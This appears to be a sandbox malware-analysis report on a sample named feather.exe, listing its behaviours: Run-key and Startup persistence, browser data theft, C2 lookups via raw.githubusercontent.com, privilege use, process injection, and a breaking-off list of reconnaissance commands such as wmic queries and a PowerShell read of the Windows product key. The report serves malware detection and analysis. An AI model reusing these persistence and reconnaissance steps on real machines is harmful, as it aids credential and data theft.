Key value queried \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\feather.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsDriverSetupqfB3Eu = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\CachedFiles\\feather.exe" C:\Windows\system32\reg.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.jfm C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jcp C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.jtx C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSStmp.log C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00002.jrs C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.chk C:\Windows\System32\svchost.exe N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSS.log C:\Windows\System32\svchost.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\DataSharing\Storage\DSSres00001.jrs C:\Windows\System32\svchost.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2 C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1 C:\Users\Admin\AppData\Local\Temp\feather.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\taskkill.exe N/A
N/A N/A C:\Windows\system32\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Windows\system32\mspaint.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings C:\Windows\system32\mspaint.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\System32\notepad.exe N/A

Runs net.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\4n7\EvilGoose\hg\GooseDesktop.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\feather.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A
N/A N/A C:\Windows\system32\mspaint.exe N/A
N/A N/A C:\Windows\system32\OpenWith.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1804 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4784 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 1804 wrote to memory of 1316 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Users\Admin\AppData\Local\Temp\feather.exe
PID 4784 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4784 wrote to memory of 3660 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1804 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 1676 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4340 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 5084 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1676 wrote to memory of 1608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 1676 wrote to memory of 1608 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\net.exe
PID 5084 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5084 wrote to memory of 2232 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 5084 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 5084 wrote to memory of 2352 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4340 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4340 wrote to memory of 4372 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1608 wrote to memory of 2148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1608 wrote to memory of 2148 N/A C:\Windows\system32\net.exe C:\Windows\system32\net1.exe
PID 1804 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4336 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 4336 wrote to memory of 3352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4336 wrote to memory of 3352 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4336 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4336 wrote to memory of 1624 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 1804 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 1804 wrote to memory of 4200 N/A C:\Users\Admin\AppData\Local\Temp\feather.exe C:\Windows\system32\cmd.exe
PID 4200 wrote to memory of 3324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4200 wrote to memory of 3324 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 4200 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com
PID 4200 wrote to memory of 2556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\more.com

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1968 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Users\Admin\AppData\Local\Temp\feather.exe

"C:\Users\Admin\AppData\Local\Temp\feather.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\obligasteis" --mojo-platform-channel-handle=2044 --field-trial-handle=1972,i,13653388541210594517,12772611045315979887,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1804 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "net session"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"

C:\Windows\system32\net.exe

net session

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption, osarchitecture

C:\Windows\system32\more.com

more +1

C:\Windows\system32\net1.exe

C:\Windows\system32\net1 session

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"

C:\Windows\System32\Wbem\WMIC.exe

wmic PATH Win32_VideoController get name

C:\Windows\system32\more.com

more +1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion' -Name ProductName

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=1804 get ExecutablePath"

C:\Windows\System32\Wbem\WMIC.exe

wmic process where processid=1804 get ExecutablePath

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

